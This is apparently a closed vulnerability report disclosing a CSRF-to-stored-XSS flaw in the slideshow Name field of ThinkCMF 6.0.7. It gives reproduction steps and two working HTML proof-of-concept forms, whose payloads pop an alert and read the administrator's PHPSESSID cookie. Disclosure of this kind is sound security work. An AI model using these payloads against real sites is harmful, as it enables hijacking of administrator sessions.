Closed
Description
ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.
Here are the steps to reproduce the issue.
- A remote user tricks the logged in administrator into visiting a malicious site.
- The administrator opens the page containing the CSRF payload, injecting the XSS payload into the Slideshow Management (幻灯片管理) page, in the Name (名称) field.
- The administrator opens the Slideshow Management (幻灯片管理) page, clicks on Admin Page (管理页面) button and the stored payload is executed.
Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).
These are the PoCs I used.
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(0)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(document.cookie)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
Screenshots

Fig. 1: CSRF that contains an XSS payload

Fig.2: CSRF payload triggered

Fig. 3: XSS payload injected

Fig. 4: XSS triggered

Fig. 5: Reading the PHPSESSID cookie